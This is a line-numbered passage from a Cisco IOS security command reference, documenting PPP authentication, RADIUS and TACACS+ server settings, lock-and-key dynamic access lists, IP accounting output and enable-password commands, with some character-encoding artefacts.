7850password Must contain from 1 to 25 uppercase and lowercase alphanumeric characters.
7851Default
7852Remote PAP support disabled.
7853Command Mode
7854You must configure this command for each interface.
7855Usage Guidelines
7856This command first appeared in Cisco IOS Release 11.2.
7857Use this command to reenable remote PAP support (for example to respond to the peer's request
7858to authenticate with PAP) and to specify the parameters to be used when sending the PAP
7859Authentication Request.
7860This is a per-interface command.
7861Example
7862The commands in the following example identify dialer interface 0 as the dialer rotary group
7863leader and specify PPP as the method of encapsulation used by the interface. Authentication is
7864by CHAP or PAP on received calls only. ISPCor is the username sent to the peer if the peer
7865requires the router to authenticate with PAP.
7866interface dialer0
7867encapsulation ppp
7868ppp authentication chap pap callin
7869ppp chap hostname ISPCor
7870ppp pap sent username ISPCorp password 7 fjhfeu
7871ppp pap sent-username ISPCorp password 7 1123659238
7872Related Commands
7873aaa authentication ppp
7874ppp authentication
7875ppp chap hostname
7876ppp chap password
7877ppp use-tacacs
7878
7879[12.5.6] ppp use-tacacs
7880To enable TACACS for PPP authentication, use the ppp use-tacacs interface configuration
7881command. Use the no form of the command to disable TACACS for PPP authentication.
7882ppp use-tacacs [single-line]
7883no ppp use-tacacs
7884
7885Note This command is not used in AAA/TACACS+. It has been replaced with the aaa
7886authentication ppp command.
7887
7888Syntax Description
7889single-line (Optional) Accept the username and password in the username field. This option
7890applies only when using CHAP authentication.
7891Default
7892TACACS is not used for PPP authentication.
7893Command Mode
7894Interface configuration
7895Usage Guidelines
7896This command first appeared in Cisco IOS Release 10.3.
7897This is a per-interface command. Use this command only when you have set up an extended
7898TACACS server.
7899When CHAP authentication is being used, the ppp use-tacacs command with the single-line
7900option specifies that if a username and password are specified in the username, separated by an
7901asterisk (*), a standard TACACS login query is performed using that username and password. If
7902the username does not contain an asterisk, then normal CHAP authentication is performed.
7903This feature is useful when integrating TACACS with other authentication systems that require a
7904cleartext version of the user's password. Such systems include one-time password systems,
7905token card systems, and Kerberos.
7906 Caution Normal CHAP authentications prevent the cleartext password from being
7907transmitted over the link. When you use the single-line option, passwords cross the link as
7908cleartext.
7909If the username and password are contained in the CHAP password, the CHAP secret is not
7910used by the Cisco IOS software. Because most PPP clients require that a secret be specified,
7911you can use any arbitrary string, and the Cisco IOS software ignores it.
7912Examples
7913In the following example, asynchronous serial interface 1 is configured to use TACACS for CHAP
7914authentication:
7915interface async 1
7916ppp authentication chap
7917ppp use-tacacs
7918In the following example, asynchronous serial interface 1 is configured to use TACACS for PAP
7919authentication:
7920interface async 1
7921ppp authentication pap
7922ppp use-tacacs
7923Related Commands
7924ppp authentication
7925tacacs-server extended
7926tacacs-server host
7927
7928[12.5.7] radius-server dead-time
7929To improve RADIUS response times when some servers might be unavailable, use the radius-
7930server dead-time global configuration command to cause the unavailable servers to be skipped
7931immediately. Use the no form of this command to set dead-time to 0.
7932radius-server dead-time minutes
7933no radius-server dead-time
7934Syntax Description
7935minutes Length of time a RADIUS server is skipped over by transaction requests, up to a
7936maximum of 1440 minutes (24 hours).
7937Default
7938Dead time is set to 0.
7939Command Mode
7940Global configuration
7941Usage Guidelines
7942Use this command to cause the Cisco IOS to mark as "dead" RADIUS servers that fail to respond
7943to authentication requests, thus avoiding the wait for the request to time out before trying the next
7944configured server. A RADIUS server marked as "dead" is skipped by additional requests for the
7945duration of minutes or unless there are no servers not marked "dead."
7946Example
7947The following example specifies 5 minutes dead-time for RADIUS servers that fail to respond to
7948authentication requests.
7949radius-server dead-time 5
7950Related Commands
7951radius-server host
7952radius-server retransmit
7953radius-server timeout
7954
7955[12.5.8] radius-server host
7956To specify a RADIUS server host, use the radius-server host global configuration command.
7957Use the no form of this command to delete the specified RADIUS host.
7958radius-server host {hostname | ip-address} [auth-port port-number] [acct-port port-number]
7959no radius-server host {hostname | ip-address}
7960Syntax Description
7961hostname DNS name of the RADIUS server host.
7962ip-address IP address of the RADIUS server host.
7963auth-port Specifies the UDP destination port for authentication requests.
7964port-number Port number for authentication requests; the host is not used for authentication if
7965set to 0.
7966acct-port Specifies the UDP destination port for accounting requests.
7967port-number Port number for accounting requests; the host is not used for accounting if set to
79680.
7969Default
7970No RADIUS host is specified.
7971Command Mode
7972Global configuration
7973Usage Guidelines
7974You can use multiple radius-server host commands to specify multiple hosts. The software
7975searches for hosts in the order you specify them.
7976Example
7977The following example specifies host1 as the RADIUS server and uses default ports for both
7978accounting and authentication.
7979radius-server host host1.company.com
7980The following example specifies port 12 as the destination port for authentication requests and
7981port 16 as the destination port for accounting requests on a RADIUS host named host1:
7982radius-server host host1.company.com auth-port 12 acct-port 16
7983Note that because entering a line resets all the port numbers, you must specify a host and
7984configure accounting and authentication ports on a single line.
7985To use separate servers for accounting and authentication, use the zero port value as
7986appropriate. The following example specifies that RADIUS server host1 be used for accounting
7987but not for authentication, and that RADIUS server host2 be used for authentication but not for
7988accounting:
7989 radius-server host host1.company.com auth-port 0
7990 radius-server host host2.company.com acct-port 0
7991Related Commands
7992A dagger (†) indicates that the command is documented outside this chapter.
7993aaa accounting â€
7994aaa authentication
7995aaa authorization
7996login authentication â€
7997login tacacs
7998pppâ€
7999ppp authentication
8000slip â€
8001tacacs-server
8002username â€
8003
8004[12.5.9] radius-server key
8005Use the radius-server key global configuration command to set the authentication and
8006encryption key for all RADIUS communications between the router and the RADIUS daemon.
8007Use the no form of the command to disable the key.
8008radius-server key {string}
8009no radius-server key
8010Syntax Description
8011string (Optional) The key used to set authentication and encryption.
8012This key must match the encryption used on the RADIUS daemon.
8013Default
8014Disabled
8015Command Mode
8016Global Configuration
8017Usage Guidelines
8018This command first appeared in Cisco IOS Release 11.1.
8019After enabling AAA authentication with the aaa new-model command, you must set the
8020authentication and encryption key using the radius-server key command.
8021
8022Note Specify a RADIUS key after you issue the aaa newmodel command.
8023
8024The key entered must match the key used on the RADIUS daemon. All leading spaces are
8025ignored, but spaces within and at the end of the key are used. If you use spaces in your key, do
8026not enclose the key in quotation marks unless the quotation marks themselves are part of the
8027key.
8028Example
8029The following example illustrates how to set the authentication and encryption key to "dare to go":
8030radius-server key dare to go
8031Related Commands
8032A dagger (†) indicates that the command is documented outside this chapter.
8033login authentication â€
8034login tacacs
8035ppp â€
8036ppp authentication
8037slip â€
8038tacacs-server
8039username â€
8040
8041[12.6.0] radius-server retransmit
8042To specify the number of times the Cisco IOS software searches the list of RADIUS server hosts
8043before giving up, use the radius-server retransmit global configuration command. Use the no
8044form of this command to disable retransmission.
8045radius-server retransmit retries
8046no radius-server retransmit
8047Syntax Description
8048retries Maximum number of retransmission attempts.
8049Default
8050Three retries
8051Command Mode
8052Global configuration
8053Usage Guidelines
8054This command first appeared in Cisco IOS Release 11.1.
8055The Cisco IOS software tries all servers, allowing each one to time out before increasing the
8056retransmit count.
8057Example
8058The following example specifies a retransmit counter value of five times:
8059radius-server retransmit 5
8060radius-server timeout
8061To set the interval a router waits for a server host to reply, use the radius-server timeout global
8062configuration command. Use the no form of this command to restore the default.
8063radius-server timeout seconds
8064no radius-server timeout
8065Syntax Description
8066seconds Integer that specifies the timeout interval in seconds.
8067Default
80685 seconds
8069Command Mode
8070Global configuration
8071Usage Guidelines
8072This command first appeared in Cisco IOS Release 11.1.
8073Example
8074The following example changes the interval timer to 10 seconds:
8075radius-server timeout 10
8076Related Commands
8077A dagger (†) indicates that the command is documented outside this chapter.
8078login authentication â€
8079login tacacs
8080ppp â€
8081ppp authenticationâ€
8082slip â€
8083tacacs-server â€
8084username â€
8085
8086[12.6.1] show kerberos creds
8087Use the show kerberos creds EXEC command to display the contents of your credentials
8088cache.
8089show kerberos creds
8090Syntax Description
8091This command has no keywords or arguments.
8092Command Mode
8093EXEC
8094Usage Guidelines
8095This command first appeared in Cisco IOS Release 11.1.
8096The show kerberos creds command is equivalent to the UNIX klist command.
8097When users authenticate themselves with Kerberos, they are issued an authentication ticket
8098called a credential. The credential is stored in a credential cache.
8099Sample Displays
8100In the following example, the entries in the credentials cache are displayed:
8101Router> show kerberos creds
8102Default Principal: chet@cisco.com
8103Valid Starting Expires Service Principal
810418-Dec-1995 16:21:07 19-Dec-1995 00:22:24 krbtgt/CISCO.COM@CISCO.COM
8105
8106In the following example, output is returned that acknowledges that credentials do not exist in the
8107credentials cache:
8108Router> show kerberos creds
8109No Kerberos credentials
8110Related Command
8111clear kerberos creds
8112
8113[12.6.2] show privilege
8114To display your current level of privilege, use the show privilege EXEC command.
8115show privilege
8116Syntax Description
8117This command has no arguments or keywords.
8118Command Mode
8119EXEC
8120Usage Guidelines
8121This command first appeared in Cisco IOS Release 10.3.
8122Sample Display
8123The following is sample output from the show privilege command. The current privilege level is
812415.
8125Router# show privilege
8126Current privilege level is 15
8127Related Command
8128A dagger (†) indicates that the command is documented outside this chapter.
8129enable password â€
8130
8131[12.6.3] tacacs-server key
8132Use the tacacs-server key global configuration command to set the authentication encryption
8133key used for all TACACS+ communications between the access server and the TACACS+
8134daemon. Use the no form of the command to disable the key.
8135tacacs-server key key
8136no tacacs-server key [key]
8137Syntax Description
8138key Key used to set authentication and encryption. This key must match the key used on the
8139TACACS+ daemon.
8140Command Mode
8141Global Configuration
8142Usage Guidelines
8143This command first appeared in Cisco IOS Release 11.1.
8144After enabling AAA with the aaa new-model command, you must set the authentication and
8145encryption key using the tacacs-server key command.
8146The key entered must match the key used on the TACACS+ daemon. All leading spaces are
8147ignored; spaces within and at the end of the key are not. If you use spaces in your key, do not
8148enclose the key in quotation marks unless the quotation marks themselves are part of the key.
8149Example
8150The following example illustrates how to set the authentication and encryption key to "dare to go":
8151tacacs-server key dare to go
8152Related Commands
8153aaa new-model
8154tacacs-server host
8155
8156[12.6.4] tacacs-server login-timeout
8157To specify how long the system will wait for login input (such as username and password) before
8158timing out, use the tacacs-server login-timeout global configuration command. Use the no form
8159of this command to restore the default value of 30 seconds.
8160tacacs-server login-timeout seconds
8161no tacacs-server login-timeout seconds
8162Syntax Description
8163seconds Integer that determines the number of seconds the system will wait for login input
8164before timing out. Available settings are from 1 to 300 seconds.
8165Default
8166The default login timeout value is 30 seconds.
8167Command Mode
8168Global configuration
8169Usage Guidelines
8170With aaa new-model enabled, the default login timeout value is 30 seconds. The tacacs-server
8171login-timeout command lets you change this timeout value from 1 to 300 seconds. To restore
8172the default login timeout value of 30 seconds, use the no tacacs-server login-timeout
8173command.
8174Example
8175The following example changes the login timeout value to 60 seconds:
8176tacacs login 60
8177
8178[12.6.5] tacacs-server authenticate
8179To configure the Cisco IOS software to indicate whether a user can perform an attempted action
8180under TACACS and extended TACACS, use the tacacs-server authenticate global
8181configuration command.
8182tacacs-server authenticate {connection [always]enable | slip [always] [access-lists]}
8183Syntax Description
8184connection Configures a required response when a user makes a TCP connection.
8185enable Configures a required response when a user enters the enable command.
8186slip Configures a required response when a user starts a SLIP or PPP session.
8187always (Optional) Performs authentication even when a user is not logged in. This option only
8188applies to the slip keyword.
8189access-lists (Optional) Requests and installs access lists. This option only applies to the slip
8190keyword.
8191Command Mode
8192Global configuration
8193Usage Guidelines
8194The tacacs-server authenticate [connection | enable] command first appeared in Cisco IOS
8195Release 10.0. The tacacs-server authenticate {connection [always]enable | slip [always]
8196[access-lists]} command first appeared in Cisco IOS Release 10.3.
8197Enter one of the keywords to specify the action (when a user enters enable mode, for example).
8198Before you use the tacacs-server authenticate command, you must enable the tacacs-server
8199extended command.
8200
8201Note This command is not used in AAA/TACACS+. It has been replaced by the aaa
8202authorization command.
8203
8204Example
8205The following example configures TACACS logins that authenticate users to use Telnet or rlogin:
8206tacacs-server authenticate connect
8207Related Commands
8208A dagger (†) indicates that the command is documented outside this chapter.
8209enable secret â€
8210enable use-tacacs
8211
8212[12.6.6] tacacs-server directed-request
8213To send only a username to a specified server when a direct request is issued, use the tacacs-
8214server directed-request global configuration command. Use the no form of this command to
8215disable the direct-request feature.
8216tacacs-server directed-request
8217no tacacs-server directed-request
8218Syntax Description
8219This command has no arguments or keywords.
8220Default
8221Enabled
8222Command Mode
8223Global configuration
8224Usage Guidelines
8225This command first appeared in Cisco IOS Release 11.1.
8226This command sends only the portion of the username before the "@" symbol to the host
8227specified after the "@" symbol. In other words, with the directed-request feature enabled, you can
8228direct a request to any of the configured servers, and only the username is sent to the specified
8229server.
8230Disabling tacacs-server directed-request causes the whole string, both before and after the "@"
8231symbol, to be sent to the default tacacs server. When the directed-request feature is disabled, the
8232router queries the list of servers, starting with the first one in the list, sending the whole string, and
8233accepting the first response that it gets from the server. The tacacs-server directed-request
8234command is useful for sites that have developed their own TACACS server software that parses
8235the whole string and makes decisions based on it.
8236With tacacs-server directed-request enabled, only configured TACACS servers can be
8237specified by the user after the "@" symbol. If the host name specified by the user does not match
8238the IP address of a TACACS server configured by the administrator, the user input is rejected.
8239Use no tacacs-server directed-request to disable the ability of the user to choose between
8240configured TACACS servers and to cause the entire string to be passed to the default server.
8241Example
8242The following example enables tacacs-server directed-request so that the entire user input is
8243passed to the default TACACS server:
8244no tacacs-server directed-request
8245tacacs-server extended
8246To enable an extended TACACS mode, use the tacacs-server extended global configuration
8247command. Use the no form of this command to disable the mode.
8248tacacs-server extended
8249no tacacs-server extended
8250Syntax Description
8251This command has no arguments or keywords.
8252Default
8253Disabled
8254Command Mode
8255Global configuration
8256Usage Guidelines
8257This command first appeared in Cisco IOS Release 10.0.
8258This command initializes extended TACACS. To initialize AAA/TACACS+, use the aaa new-
8259model command.
8260Example
8261The following example enables extended TACACS mode:
8262tacacs-server extended
8263tacacs-server host
8264To specify a TACACS host, use the tacacs-server host global configuration command. Use the
8265no form of this command to delete the specified name or address.
8266tacacs-server host hostname [single-connection] [port integer] [timeout integer] [key
8267string]
8268no tacacs-server host hostname
8269Syntax Description
8270hostname Name or IP address of the host.
8271single-connection Specify that the router maintain a single open connection for confirmation
8272from a AAA/TACACS+ server (CiscoSecure Release 1.0.1 or later). This command contains no
8273autodetect and fails if the specified host is not running a CiscoSecure daemon.
8274port Specify a server port number.
8275integer Port number of the server (in the range 1 to 10,000).
8276timeout Specify a timeout value. This overrides the global timeout value set with the
8277tacacs-server timeout command for this server only.
8278integer Integer value, in seconds, of the timeout interval.
8279key Specify an authentication and encryption key. This must match the key used by the
8280TACACS+ daemon. Specifying this key overrides the key set by the global command tacacs-
8281server key for this server only.
8282string Character string specifying authentication and encryption key.
8283Default
8284No TACACS host is specified.
8285Command Mode
8286Global configuration
8287Usage Guidelines
8288This command first appeared in Cisco IOS Release 10.0.
8289You can use multiple tacacs-server host commands to specify additional hosts. The Cisco IOS
8290software searches for hosts in the order in which you specify them. Use the single-connection,
8291port, timeout, and key options only when running a AAA/TACACS+ server.
8292Because some of the parameters of the tacacs-server host command override global settings
8293made by the tacacs-server timeout and tacacs-server key commands, you can use this
8294command to enhance security on your network by uniquely configuring individual routers.
8295Examples
8296The following example specifies a TACACS host named Sea_Change:
8297tacacs-server host Sea_Change
8298The following example specifies that, for AAA confirmation, the router consult the CiscoSecure
8299TACACS+ host named Sea_Cure on port number 51. The timeout value for requests on this
8300connection is 3 seconds; the encryption key is a_secret.
8301tacacs-server host Sea_Cure single-connection port 51 timeout 3 key a_secret
8302Related Commands
8303A dagger (†) indicates that the command is documented outside this chapter.
8304login tacacs
8305ppp â€
8306slip â€
8307tacacs-server key
8308tacacs-server timeout
8309
8310[12.6.7] tacacs-server key
8311Use the tacacs-server key global configuration command to set the authentication encryption
8312key used for all TACACS+ communications between the access server and the TACACS+
8313daemon. Use the no form of the command to disable the key.
8314tacacs-server key key
8315no tacacs-server key [key]
8316Syntax Description
8317key Key used to set authentication and encryption. This key must match the key used on the
8318TACACS+ daemon.
8319Command Mode
8320Global Configuration
8321Usage Guidelines
8322This command first appeared in Cisco IOS Release 11.1.
8323After enabling AAA with the aaa new-model command, you must set the authentication and
8324encryption key using the tacacs-server key command.
8325The key entered must match the key used on the TACACS+ daemon. All leading spaces are
8326ignored; spaces within and at the end of the key are not. If you use spaces in your key, do not
8327enclose the key in quotation marks unless the quotation marks themselves are part of the key.
8328Example
8329The following example illustrates how to set the authentication and encryption key to "dare to go":
8330tacacs-server key dare to go
8331Related Commands
8332aaa new-model
8333tacacs-server host
8334
8335[12.6.8] tacacs-server last-resort
8336To cause the network access server to request the privileged password as verification, or to allow
8337successful login without further input from the user, use the tacacs-server last-resort global
8338configuration command. Use the no tacacs-server last-resort command to restore the system to
8339the default behavior.
8340tacacs-server last-resort {password | succeed}
8341no tacacs-server last-resort {password | succeed}
8342Syntax Description
8343password Allows the user to access the EXEC command mode by entering the password
8344set by the enable command.
8345succeed Allows the user to access the EXEC command mode without further question.
8346Default
8347If, when running the TACACS server, the TACACS server does not respond, the default action is
8348to deny the request.
8349Command Mode
8350Global configuration
8351Usage Guidelines
8352This command first appeared in Cisco IOS Release 10.0.
8353Use the tacacs-server last-resort command to be sure that login can occur; for example, when
8354a systems administrator needs to log in to troubleshoot TACACS servers that might be down.
8355
8356Note This command is not used in AAA/TACACS+.
8357
8358Example
8359The following example forces successful login:
8360tacacs-server last-resort succeed
8361Related Commands
8362A dagger (†) indicates that the command is documented outside this chapter.
8363enable password â€
8364login (EXEC) â€
8365
8366[12.6.9] tacacs-server notify
8367Use the tacacs-server notify global configuration command to cause a message to be
8368transmitted to the TACACS server, with retransmission being performed by a background
8369process for up to 5 minutes. Use the no form of this command to disable notification.
8370tacacs-server notify {connection [always] | enable | logout [always] | slip [always]}
8371no tacacs-server notify
8372Syntax Description
8373connection Specifies that a message be transmitted when a user makes a TCP connection.
8374always (Optional) Sends a message even when a user is not logged in. This option applies only
8375to SLIP or PPP sessions and can be used with the logout or slip keywords.
8376enable Specifies that a message be transmitted when a user enters the enable command.
8377logout Specifies that a message be transmitted when a user logs out.
8378slip Specifies that a message be transmitted when a user starts a SLIP or PPP session.
8379Default
8380No message is transmitted to the TACACS server.
8381Command Mode
8382Global configuration
8383Usage Guidelines
8384This command first appeared in Cisco IOS Release 10.0. The always and slip commands first
8385appeared in Cisco IOS Release 11.0.
8386The terminal user receives an immediate response, allowing access to the feature specified.
8387Enter one of the keywords to specify notification of the TACACS server upon receipt of the
8388corresponding action (when user logs out, for example).
8389
8390Note This command is not used in AAA/TACACS+. It has been replaced by the
8391aaa accounting suite of commands.
8392
8393Example
8394The following example sets up notification of the TACACS server when a user logs out:
8395tacacs-server notify logout
8396
8397[12.7.0] tacacs-server optional-passwords
8398To specify that the first TACACS request to a TACACS server be made without password
8399verification, use the tacacs-server optional-passwords global configuration command. Use the
8400no form of this command to restore the default.
8401tacacs-server optional-passwords
8402no tacacs-server optional-passwords
8403Syntax Description
8404This command has no arguments or keywords.
8405Default
8406Disabled
8407Command Mode
8408Global configuration
8409Usage Guidelines
8410This command first appeared in Cisco IOS Release 10.0.
8411When the user enters in the login name, the login request is transmitted with the name and a
8412zero-length password. If accepted, the login procedure completes. If the TACACS server refuses
8413this request, the server software prompts for a password and tries again when the user supplies a
8414password. The TACACS server must support authentication for users without passwords to make
8415use of this feature. This feature supports all TACACS requests---login, SLIP, enable, and so on.
8416
8417Note This command is not used by AAA/TACACS+.
8418
8419Example
8420The following example configures the first login to not require TACACS verification:
8421tacacs-server optional-passwords
8422
8423[12.7.1] tacacs-server retransmit
8424To specify the number of times the Cisco IOS software searches the list of TACACS server hosts
8425before giving up, use the tacacs-server retransmit global configuration command. Use the no
8426form of this command to disable retransmission.
8427tacacs-server retransmit retries
8428no tacacs-server retransmit
8429Syntax Description
8430retries Integer that specifies the retransmit count.
8431Default
8432Two retries
8433Command Mode
8434Global configuration
8435Usage Guidelines
8436This command first appeared in Cisco IOS Release 10.0.
8437The Cisco IOS software will try all servers, allowing each one to time out before increasing the
8438retransmit count.
8439Example
8440The following example specifies a retransmit counter value of five times:
8441tacacs-server retransmit 5
8442
8443[12.7.2] tacacs-server timeout
8444To set the interval that the server waits for a server host to reply, use the tacacs-server timeout
8445global configuration command. Use the no form of this command to restore the default.
8446tacacs-server timeout seconds
8447no tacacs-server timeout
8448Syntax Description
8449seconds Integer that specifies the timeout interval in seconds (between 1 and 300).
8450Default
84515 seconds
8452Command Mode
8453Global configuration
8454Usage Guidelines
8455This command first appeared in Cisco IOS Release 10.0.
8456Example
8457The following example changes the interval timer to 10 seconds:
8458tacacs-server timeout 10
8459Related Command
8460tacacs-server host
8461
8462[12.7.3] Traffic Filter Commands
8463This chapter describes the commands used to configure Lock-and-key security (IP only).
8464Other traffic filter commands are protocol-specific, and are therefore described in the appropriate
8465protocol-specific chapters in the Cisco IOS command references. You should refer to these
8466protocol-specific chapters to find detailed information about traffic filter commands for each
8467protocol. (Many of these protocols refer to the filters as "access lists.")
8468Specific information about configuring traffic filters (access lists) for these protocols can be found
8469in protocol-specific chapters in the Cisco IOS configuration guides. General guidelines for using
8470access lists can be found in the "Configuring Traffic Filters" chapter of the Security Configuration
8471Guide.
8472Lock-and-key security is implemented with extended IP dynamic access lists. Lock-and-key
8473security is available only for IP traffic, but provides more security functions than traditional static
8474traffic filters.
8475
8476[12.7.4] access-enable
8477To enable the router to create a temporary access list entry in a dynamic access list, use the
8478access-enable EXEC command.
8479access-enable [host] [timeout minutes]
8480Syntax Description
8481host (Optional) Tells the software to enable access only for the host from which the
8482Telnet session originated. If not specified, the software allows all hosts on the defined network to
8483gain access. The dynamic access list contains the network mask to use for enabling the new
8484network.
8485timeout minutes (Optional) Specifies an idle timeout for the temporary access list entry. If
8486the access list entry is not accessed within this period, it is automatically deleted and requires the
8487user to authenticate again. The default is for the entries to remain permanently. We recommend
8488that this value equal the idle timeout set for the WAN connection.
8489Command Mode
8490EXEC
8491Usage Guidelines
8492This command first appeared in Cisco IOS Release 11.1.
8493This command enables the lock-and-key access feature.
8494You should always define either an idle timeout (with the timeout keyword in this command) or
8495an absolute timeout (with the timeout keyword in the access-list command). Otherwise, the
8496temporary access list entry will remain, even after the user terminates the session.
8497Example
8498The following example causes the software to create a temporary access list entry and tells the
8499software to enable access only for the host from which the Telnet session originated. If the
8500access list entry is not accessed within 2 minutes, it is deleted.
8501autocommand access-enable host timeout 2
8502Related Commands
8503A dagger (†) indicates that the command is documented outside this chapter.
8504access-list (extended) â€
8505autocommand â€
8506
8507[12.7.5] access-template
8508To manually place a temporary access list entry on a router to which you are connected, use the
8509access-template EXEC command.
8510access-template [access-list-number | name] [dynamic-name] [source] [destination] [timeout
8511minutes]
8512Syntax Description
8513access-list-number Number of the dynamic access list.
8514name Name of an IP access list. The name cannot contain a space or quotation mark,
8515and must begin with an alphabetic character to avoid ambiguity with numbered access lists.
8516dynamic-name (Optional) Name of a dynamic access list.
8517source (Optional) Source address in a dynamic access list. The keywords host and
8518any are allowed. All other attributes are inherited from the original access-list entry.
8519destination (Optional) Destination address in a dynamic access list. The keywords host and
8520any are allowed. All other attributes are inherited from the original access-list entry.
8521timeout minutes (Optional) Specifies a maximum time limit for each entry within this
8522dynamic list. This is an absolute time, from creation, that an entry can reside in the list. The
8523default is an infinite time limit and allows an entry to remain permanently.
8524Command Mode
8525EXEC
8526Usage Guidelines
8527This command first appeared in Cisco IOS Release 11.1.
8528This command provides a way to enable the lock-and-key access feature.
8529You should always define either an idle timeout (with the timeout keyword in this command) or
8530an absolute timeout (with the timeout keyword in the access-list command). Otherwise, the
8531dynamic access list will remain, even after the user has terminated the session.
8532Example
8533In the following example, the software enables IP access on incoming packets in which the
8534source address is 172.29.1.129 and the destination address is 192.168.52.12. All other source
8535and destination pairs are discarded.
8536access-template 101 payroll host 172.29.1.129 host 192.168.52.12 timeout 2
8537Related Commands
8538A dagger (†) indicates that the command is documented outside this chapter.
8539access-list (extended) â€
8540autocommand â€
8541clear access-template
8542
8543[12.7.6] clear access-template
8544To manually clear a temporary access list entry from a dynamic access list, use the clear
8545access-template EXEC command.
8546clear access-template [access-list-number | name] [dynamic-name] [source] [destination]
8547Syntax Description
8548access-list-number (Optional) Number of the dynamic access list from which the entry is to
8549be deleted.
8550name Name of an IP access list from which the entry is to be deleted. The name
8551cannot contain a space or quotation mark, and must begin with an alphabetic character to avoid
8552ambiguity with numbered access lists.
8553dynamic-name (Optional) Name of the dynamic access list from which the entry is to be
8554deleted.
8555source (Optional) Source address in a temporary access list entry to be deleted.
8556destination (Optional) Destination address in a temporary access list entry to be deleted.
8557Command Mode
8558EXEC
8559Usage Guidelines
8560This command first appeared in Cisco IOS Release 11.1.
8561This command is related to the lock-and-key access feature. It clears any temporary access list
8562entries that match the parameters you define.
8563Example
8564The following example clears any temporary access list entries with a source of 172.20.1.12 from
8565the dynamic access list named vendor:
8566clear access-template vendor 172.20.1.12
8567Related Commands
8568A dagger (†) indicates that the command is documented outside this chapter.
8569access-list (extended) â€
8570access-template
8571
8572[12.7.7] show ip accounting
8573To display the active accounting or checkpointed database or to display access-list violations, use
8574the show ip accounting privileged EXEC command.
8575show ip accounting [checkpoint] [output-packets | access-violations]
8576Syntax Description
8577checkpoint (Optional) Indicates that the checkpointed database should be displayed.
8578output-packets (Optional) Indicates that information pertaining to packets that passed access
8579control and were successfully routed should be displayed. This is the default value if neither
8580output-packets nor access-violations is specified.
8581access-violations (Optional) Indicates that information pertaining to packets that failed
8582access lists and were not routed should be displayed.
8583Defaults
8584If neither the output-packets nor access-violations keyword is specified, show ip accounting
8585displays information pertaining to packets that passed access control and were successfully
8586routed.
8587Command Mode
8588EXEC
8589Usage Guidelines
8590This command first appeared in Cisco IOS Release 10.0.
8591To use this command, you must first enable IP accounting on a per-interface basis.
8592Sample Displays
8593Following is sample output from the show ip accounting command:
8594Router# show ip accounting
8595
8596 Source Destination Packets Bytes
8597 172.30.19.40 172.30.67.20 7 306
8598 172.30.13.55 172.30.67.20 67 2749
8599 172.30.2.50 172.30.33.51 17 1111
8600 172.30.2.50 172.30.2.1 5 319
8601 172.30.2.50 172.30.1.2 463 30991
8602 172.30.19.40 172.30.2.1 4 262
8603 172.30.19.40 172.30.1.2 28 2552
8604 172.30.20.2 172.30.6.100 39 2184
8605 172.30.13.55 172.30.1.2 35 3020
8606 172.30.19.40 172.30.33.51 1986 95091
8607 172.30.2.50 172.30.67.20 233 14908
8608 172.30.13.28 172.30.67.53 390 24817
8609 172.30.13.55 172.30.33.51 214669 9806659
8610 172.30.13.111 172.30.6.23 27739 1126607
8611 172.30.13.44 172.30.33.51 35412 1523980
8612 172.30.7.21 172.30.1.2 11 824
8613 172.30.13.28 172.30.33.2 21 1762
8614 172.30.2.166 172.30.7.130 797 141054
8615 172.30.3.11 172.30.67.53 4 246
8616 172.30.7.21 172.30.33.51 15696 695635
8617 172.30.7.24 172.30.67.20 21 916
8618 172.30.13.111 172.30.10.1 16 1137
8619
8620Field Description
8621Source Source address of the packet
8622Destination Destination address of the packet
8623Packets Number of packets transmitted from the source address to the destination
8624address
8625Bytes Number of bytes transmitted from the source address to the destination address
8626
8627Following is sample output from the show ip accounting access-violations command. (The
8628following displays information pertaining to packets that failed access lists and were not routed.)
8629Router# show ip accounting access-violations
8630
8631 Source Destination Packets Bytes ACL
8632 172.30.19.40 172.30.67.20 7 306 77
8633 172.30.13.55 172.30.67.20 67 2749 185
8634 172.30.2.50 172.30.33.51 17 1111 140
8635 172.30.2.50 172.30.2.1 5 319 140
8636 172.30.19.40 172.30.2.1 4 262 77
8637Accounting data age is 41
8638
8639Field Description
8640Source Source address of the packet
8641Destination Destination address of the packet
8642Packets For accounting keyword, number of packets transmitted from the source
8643address to the destination address
8644For access-violations keyword, number of packets transmitted from the source address to the
8645destination address that violated the access control list
8646Bytes For accounting keyword, number of bytes transmitted from the source address
8647to the destination address
8648For access-violations keyword, number of bytes transmitted from the source address to the
8649destination address that violated the access-control list
8650ACL Number of the access list of the last packet transmitted from the source to the
8651destination that failed an access list
8652Related Commands
8653A dagger (†) indicates that the command is documented outside this chapter.
8654clear ip accounting â€
8655ip accounting â€
8656ip accounting-list â€
8657ip accounting-threshold â€
8658ip accounting-transits â€
8659
8660[12.7.8] Terminal Access Security Commands
8661This chapter describes the commands used to control access to the router.
8662enable
8663To log on to the router at a specified level, use the enable EXEC command.
8664enable [level]
8665Syntax Description
8666level (Optional) Defines the privilege level that a user logs in to on the router.
8667Default
8668Level 15
8669Command Mode
8670EXEC
8671Usage Guidelines
8672This command first appeared in Cisco IOS Release 10.0.
8673
8674Note The enable command is associated with privilege level 0. If you configure AAA authorization
8675for a privilege level greater than 0, this command will not be included in the privilege level
8676command set.
8677
8678Example
8679In the following example, the user is logging on to privilege level 5 on a router:
8680enable 5
8681Related Commands
8682A dagger (†) indicates that the command is documented outside this chapter.
8683disable â€
8684privilege level (global)
8685privilege level (line)
8686
8687[12.7.9] enable password
8688Use the enable password global configuration command to set a local password to control
8689access to various privilege levels. Use the no form of this command to remove the password
8690requirement.
8691enable password [level level] {password | encryption-type encrypted-password}
8692no enable password [level level]
8693Syntax Description
8694level level (Optional) Level for which the password applies. You can specify up to 16
8695privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this
8696argument is not specified in the command or the no form of the command, the privilege level
8697defaults to 15 (traditional enable privileges).
8698password Password users type to enter enable mode.
8699encryption-type (Optional) Cisco-proprietary algorithm used to encrypt the password. Currently
8700the only encryption type available is 7. If you specify encryption-type, the next argument you
8701supply must be an encrypted password (a password already encrypted by a Cisco router).
8702encrypted-password Encrypted password you enter, copied from another router configuration.
8703
8704Default
8705No password is defined. The default is level 15.
8706Command Mode
8707Global configuration
8708Usage Guidelines
8709This command first appeared in Cisco IOS Release 10.0.
8710Use this command with the level option to define a password for a specific privilege level. After
8711you specify the level and the password, give the password to the users who need to access this
8712level. Use the privilege level (global) configuration command to specify commands accessible
8713at various levels.
8714You will not ordinarily enter an encryption type. Typically you enter an encryption type only if you
8715copy and paste into this command a password that has already been encrypted by a Cisco
8716router.
8717 Caution If you specify an encryption type and then enter a cleartext password, you will not
